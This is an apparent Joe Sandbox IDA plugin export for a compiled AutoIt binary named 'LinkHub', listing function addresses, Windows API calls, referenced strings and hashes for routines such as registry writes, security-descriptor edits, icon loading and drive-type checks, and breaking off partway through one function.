Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: c0c841378ecb643e34efcd66f9c259ca724e98521052f53c6ed1b4f4ccfde270
Instruction ID: a3960e7481ed90074030a4adc16969e23d9717aabe43f432f572286c7911a038
Opcode Fuzzy Hash: c0c841378ecb643e34efcd66f9c259ca724e98521052f53c6ed1b4f4ccfde270
Instruction Fuzzy Hash: E1B16A316002099FDB14DFA8CD99BAE7BF4FB58714F10416AFA06A72E0DB74A941CB54

Function 00B616D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B61A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B61A60
Part of subcall function 00B61A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B614E7,?,?,?), ref: 00B61A6C
Part of subcall function 00B61A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B614E7,?,?,?), ref: 00B61A7B
Part of subcall function 00B61A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B614E7,?,?,?), ref: 00B61A82
Part of subcall function 00B61A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B61A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B61741
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B61775
GetLengthSid.ADVAPI32(?), ref: 00B6178C
GetAce.ADVAPI32(?,00000000,?), ref: 00B617C6
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B617E2
GetLengthSid.ADVAPI32(?), ref: 00B617F9
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B61801
HeapAlloc.KERNEL32(00000000), ref: 00B61808
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B61829
CopySid.ADVAPI32(00000000), ref: 00B61830
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B6185F
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B61881
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B61893
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B618BA
HeapFree.KERNEL32(00000000), ref: 00B618C1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B618CA
HeapFree.KERNEL32(00000000), ref: 00B618D1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B618DA
HeapFree.KERNEL32(00000000), ref: 00B618E1
GetProcessHeap.KERNEL32(00000000,?), ref: 00B618ED
HeapFree.KERNEL32(00000000), ref: 00B618F4

Part of subcall function 00B61ADF: GetProcessHeap.KERNEL32(00000008,00B614FD,?,00000000,?,00B614FD,?), ref: 00B61AED
Part of subcall function 00B61ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B614FD,?), ref: 00B61AF4
Part of subcall function 00B61ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B614FD,?), ref: 00B61B03

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 3f797e5c061ed92413a5b0aca9a63537d4b1ede42cbeefc9d5d1e79d7c39aed5
Instruction ID: d8bba9687e321516f8fe7c0efe0fb5a11e93d829ff5697423a247796d7409f0b
Opcode Fuzzy Hash: 3f797e5c061ed92413a5b0aca9a63537d4b1ede42cbeefc9d5d1e79d7c39aed5
Instruction Fuzzy Hash: FF7159B2D01219AFDF10DFA9DD44FAEBBB8FF04300F184666E915A71A0DB359A05CB60

Function 00B8CE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B8CF1D
RegCreateKeyExW.ADVAPI32(?,?,00000000,00B9DCD0,00000000,?,00000000,?,?), ref: 00B8CFA4
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00B8D004
_wcslen.LIBCMT ref: 00B8D054
_wcslen.LIBCMT ref: 00B8D0CF
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00B8D112
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00B8D221
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00B8D2AD
RegCloseKey.ADVAPI32(?), ref: 00B8D2E1
RegCloseKey.ADVAPI32(00000000), ref: 00B8D2EE
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00B8D3C0

Strings

REG_SZ, xrefs: 00B8D0A4
REG_QWORD, xrefs: 00B8D323
REG_MULTI_SZ, xrefs: 00B8D155
REG_EXPAND_SZ, xrefs: 00B8D02D
REG_DWORD, xrefs: 00B8D264
REG_BINARY, xrefs: 00B8D373

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: d2a5695cbf4654e5b197c3efcd15184bbc3864c8b54a5aeccad35e8549095e55
Instruction ID: 65b9941f9df9d4bc040d30c7d6b4ed3064363d684c20cf5d72fda9f8137fc10f
Opcode Fuzzy Hash: d2a5695cbf4654e5b197c3efcd15184bbc3864c8b54a5aeccad35e8549095e55
Instruction Fuzzy Hash: 73126A756046019FD714EF14C891E2ABBE5FF88714F04889DF99A9B3A2CB31ED42CB91

Function 00B913BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B91462
_wcslen.LIBCMT ref: 00B9149D
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B914F0
_wcslen.LIBCMT ref: 00B91526
_wcslen.LIBCMT ref: 00B915A2
_wcslen.LIBCMT ref: 00B9161D

Part of subcall function 00B1FD52: _wcslen.LIBCMT ref: 00B1FD5D

Part of subcall function 00B63535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B63547

Strings

EXISTS, xrefs: 00B91618, 00B91633
GETTOTALCOUNT, xrefs: 00B9148E, 00B914B3
GETSELECTED, xrefs: 00B916EA
UNCHECK, xrefs: 00B917DA
GETTEXT, xrefs: 00B91733
ISCHECKED, xrefs: 00B9177D
GETITEMCOUNT, xrefs: 00B916BA
EXPAND, xrefs: 00B91694
SELECT, xrefs: 00B917AD
CHECK, xrefs: 00B91521, 00B9153C
COLLAPSE, xrefs: 00B9159D, 00B915B8

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 2e48d4f6237a756923da363b19411fd427578d79a0523c59b963ff860aa5fc1b
Instruction ID: 6230b13ee1ad585ac915f5448cc13a2091d8d322f4a5af8b4dbcc0d052b1991c
Opcode Fuzzy Hash: 2e48d4f6237a756923da363b19411fd427578d79a0523c59b963ff860aa5fc1b
Instruction Fuzzy Hash: A9E1A2316043028FCB14DF28C49096AB7E2FF98354B5589ECF8969B3A2DB31ED45DB91

Function 00B8D3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B8C10E,?,?), ref: 00B8D415
_wcslen.LIBCMT ref: 00B8D451
_wcslen.LIBCMT ref: 00B8D4C8
_wcslen.LIBCMT ref: 00B8D4FE
_wcslen.LIBCMT ref: 00B8D559
_wcslen.LIBCMT ref: 00B8D58F
_wcslen.LIBCMT ref: 00B8D5DF

Strings

HKLM, xrefs: 00B8D4F8, 00B8D4FD
HKEY_LOCAL_MACHINE, xrefs: 00B8D4C2, 00B8D4C7
HKEY_CLASSES_ROOT, xrefs: 00B8D553, 00B8D558
HKEY_CURRENT_CONFIG, xrefs: 00B8D5D9, 00B8D5DE
HKCU, xrefs: 00B8D62E
HKEY_CURRENT_USER, xrefs: 00B8D61D
HKEY_USERS, xrefs: 00B8D63F
HKCR, xrefs: 00B8D589, 00B8D58E
HKCC, xrefs: 00B8D60C
HKU, xrefs: 00B8D650

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 135de8815f25f8ad73abc18e0e9b7c8628aca939d7f44c53b2dda0a4e0331e3e
Instruction ID: 5c01e727a36590b42d1be401a0b80a01a0d9af737ca18fe01ff70ad6ded2ada1
Opcode Fuzzy Hash: 135de8815f25f8ad73abc18e0e9b7c8628aca939d7f44c53b2dda0a4e0331e3e
Instruction Fuzzy Hash: B371A27260012A8BCB10BF6CD950AFA33E1EB71754B2506EBF856972E4FA35DD44C7A0

Function 00B98D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B98DB5
_wcslen.LIBCMT ref: 00B98DC9
_wcslen.LIBCMT ref: 00B98DEC
_wcslen.LIBCMT ref: 00B98E0F
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B98E4D
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00B96691), ref: 00B98EA9
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B98EE2
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00B98F25
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B98F5C
FreeLibrary.KERNEL32(?), ref: 00B98F68
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B98F78
DestroyIcon.USER32(?,?,?,?,?,00B96691), ref: 00B98F87
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B98FA4
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B98FB0

Strings

.icl, xrefs: 00B98DC3
.dll, xrefs: 00B98E06
.exe, xrefs: 00B98DE3

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 5913cbb9aaaddb7b9ff1db084fa2288572a6e1f273893bb6f4b5c313edbe48b0
Instruction ID: e6ba40efc14747ef13e8403b0ca1e1c728751d2e2ec1ca40fc3f56f8822e28fb
Opcode Fuzzy Hash: 5913cbb9aaaddb7b9ff1db084fa2288572a6e1f273893bb6f4b5c313edbe48b0
Instruction Fuzzy Hash: B861DF71900619FAEF149F64DC45BBE7BE8EF09B10F1045AAF815D61D1DFB4AA40CBA0

Function 00B748BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00B7493D
_wcslen.LIBCMT ref: 00B74948
_wcslen.LIBCMT ref: 00B7499F
_wcslen.LIBCMT ref: 00B749DD
GetDriveTypeW.KERNEL32(?), ref: 00B74A1B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B74A63
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B74A9E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B74ACC

Strings

wait, xrefs: 00B74A89
type cdaudio alias cd wait, xrefs: 00B74A46
close cd wait, xrefs: 00B74AB7
open, xrefs: 00B74999, 00B7499E
set cd door , xrefs: 00B74A6D
close, xrefs: 00B74943, 00B7495D
open , xrefs: 00B74A2A
closed, xrefs: 00B7494D, 00B74972, 00B7498B, 00B749C3, 00B749DC

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: 0c1b579f79f962fc248e050e0f2c01e09402691d965a5d290040cb97915ec80a
Instruction ID: cf1864bc3aebdae8c9c1b35fbe2d308ed87ffa93b9b336e3ccd4499e16c48f18
Opcode Fuzzy Hash: 0c1b579f79f962fc248e050e0f2c01e09402691d965a5d290040cb97915ec80a
Instruction Fuzzy Hash: 5D71F4725083129FC710EF38C88096BBBE4EF94754F1089ADF8A9972A1EB31DD45CB91

Function 00B66382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00B66395
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B663A7
SetWindowTextW.USER32(?,?), ref: 00B663BE
GetDlgItem.USER32(?,000003EA), ref: 00B663D3
SetWindowTextW.USER32(00000000,?), ref: 00B663D9
GetDlgItem.USER32(?,000003E9), ref: 00B663E9
SetWindowTextW.USER32(00000000,?), ref: 00B663EF
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B66410
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B6642A
GetWindowRect.USER32(?,?), ref: 00B66433
_wcslen.LIBCMT ref: 00B6649A
SetWindowTextW.USER32(?,?), ref: 00B664D6
GetDesktopWindow.USER32 ref: 00B664DC
GetWindowRect.USER32(00000000), ref: 00B664E3
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00B6653A
GetClientRect.USER32(?,?), ref: 00B66547
PostMessageW.USER32(?,00000005,00000000,?), ref: 00B6656C
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B66596

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 92a6f1676810fc2ad0f4539505905becb0eb98a8e5c78791815e67380c1584f4
Instruction ID: 4f6f5ef746d4c93c0f83dc7bbf3c5267738c25f27886ae25e647a4c705b8fa74
Opcode Fuzzy Hash: 92a6f1676810fc2ad0f4539505905becb0eb98a8e5c78791815e67380c1584f4
Instruction Fuzzy Hash: C8718F31900609AFDB20DFA9CE85B6EBBF5FF48704F100559E186A36A0DB79ED40CB50

Function 00B8086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00B80884
LoadCursorW.USER32(00000000,00007F8A), ref: 00B8088F
LoadCursorW.USER32(00000000,00007F00), ref: 00B8089A
LoadCursorW.USER32(00000000,00007F03), ref: 00B808A5
LoadCursorW.USER32(00000000,00007F8B), ref: 00B808B0
LoadCursorW.USER32(00000000,00007F01), ref: 00B808BB
LoadCursorW.USER32(00000000,00007F81), ref: 00B808C6
LoadCursorW.USER32(00000000,00007F88), ref: 00B808D1
LoadCursorW.USER32(00000000,00007F80), ref: 00B808DC
LoadCursorW.USER32(00000000,00007F86), ref: 00B808E7
LoadCursorW.USER32(00000000,00007F83), ref: 00B808F2
LoadCursorW.USER32(00000000,00007F85), ref: 00B808FD
LoadCursorW.USER32(00000000,00007F82), ref: 00B80908
LoadCursorW.USER32(00000000,00007F84), ref: 00B80913
LoadCursorW.USER32(00000000,00007F04), ref: 00B8091E
LoadCursorW.USER32(00000000,00007F02), ref: 00B80929
GetCursorInfo.USER32(?), ref: 00B80939
GetLastError.KERNEL32 ref: 00B8097B

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: af855ab6177710aaf57ed83cc03025ee7161f6d7a5b0e0e0c6df2c389bb4543f
Instruction ID: e997871d1620f36ab3ff4edec597d764acaca6472f7bb5a2c6eba5421e5f5963
Opcode Fuzzy Hash: af855ab6177710aaf57ed83cc03025ee7161f6d7a5b0e0e0c6df2c389bb4543f
Instruction Fuzzy Hash: 94416570D083196BDB50EFBA8C8585EBFE8FF04754B50456AE11CE7291DA78D801CF91

Function 00B20436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00B20436

Part of subcall function 00B2045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00BD170C,00000FA0,5696B3C9,?,?,?,?,00B42733,000000FF), ref: 00B2048C
Part of subcall function 00B2045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00B42733,000000FF), ref: 00B20497
Part of subcall function 00B2045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00B42733,000000FF), ref: 00B204A8
Part of subcall function 00B2045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00B204BE
Part of subcall function 00B2045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00B204CC
Part of subcall function 00B2045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00B204DA
Part of subcall function 00B2045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B20505
Part of subcall function 00B2045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B20510

___scrt_fastfail.LIBCMT ref: 00B20457

Part of subcall function 00B20413: __onexit.LIBCMT ref: 00B20419

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B20492
kernel32.dll, xrefs: 00B204A3
WakeAllConditionVariable, xrefs: 00B204D2
SleepConditionVariableCS, xrefs: 00B204C4
InitializeConditionVariable, xrefs: 00B204B8

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: dfc56e006c5b50b017e6c57eb6e1201e38093fb82c1a2e74d7e26684074ea45c
Instruction ID: 8130010818b7ffbb8ba78797a94ff06934b685c4d699f2bf9cb99f24db10db03
Opcode Fuzzy Hash: dfc56e006c5b50b017e6c57eb6e1201e38093fb82c1a2e74d7e26684074ea45c
Instruction Fuzzy Hash: C621F933A647347BD7103BA8BD46B6977E4DF15B61F0005A7F909A32A2EF709C008B50

Function 00B63A43 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B63AD9
_wcslen.LIBCMT ref: 00B63B44

Strings

CLASSNN, xrefs: 00B63B3F, 00B63B50
REGEXPCLASS, xrefs: 00B63BA1, 00B63BB2
TEXT, xrefs: 00B63DC8
INSTANCE, xrefs: 00B63D9F
CLASS, xrefs: 00B63AD4, 00B63AF1
NAME, xrefs: 00B63C81, 00B63C92

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 268a5846e5a5e7300109ae35d8aa05253777ac374816ee1671b57e17e6a7da95
Instruction ID: 26ff0310444f251b1a6c32dfac22049c2fdaa10d4ca0d9820c1e7c5fa5242a17
Opcode Fuzzy Hash: 268a5846e5a5e7300109ae35d8aa05253777ac374816ee1671b57e17e6a7da95
Instruction Fuzzy Hash: 33E1D432A00616ABCB149FB4C891BFDFBF4FF14B10F1441A9E456E7250DB34AE8597A0

Function 00B74F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,00B9DCD0), ref: 00B74F6C
_wcslen.LIBCMT ref: 00B74F80
_wcslen.LIBCMT ref: 00B74FDE
_wcslen.LIBCMT ref: 00B75039
_wcslen.LIBCMT ref: 00B75084
_wcslen.LIBCMT ref: 00B750EC

Part of subcall function 00B1FD52: _wcslen.LIBCMT ref: 00B1FD5D

GetDriveTypeW.KERNEL32(?,00BC7C10,00000061), ref: 00B75188

Strings

network, xrefs: 00B750E2, 00B750E7
all, xrefs: 00B74F76, 00B74F7B
unknown, xrefs: 00B7514D
ramdisk, xrefs: 00B75136
cdrom, xrefs: 00B74FD4, 00B74FD9
removable, xrefs: 00B7502F, 00B75034
fixed, xrefs: 00B7507A, 00B7507F

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: cc518227321ddae2b8ff2c5ef0c1e5c0da6ad5dda4e0177378cfb1cb9866e82c
Instruction ID: 5de3209d619eb7892ed569402015bae6f7ef715f70f12fbd71e95a974a13d83a
Opcode Fuzzy Hash: cc518227321ddae2b8ff2c5ef0c1e5c0da6ad5dda4e0177378cfb1cb9866e82c
Instruction Fuzzy Hash: 95B1C5316087029FC720DF28C890A6AB7E5FFA4710F50899DF5AAD7291DBB0DD44CB92

Function 00B8BA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B8BBF8
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B8BC10
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B8BC34
_wcslen.LIBCMT ref: 00B8BC60
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B8BC74
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B8BC96
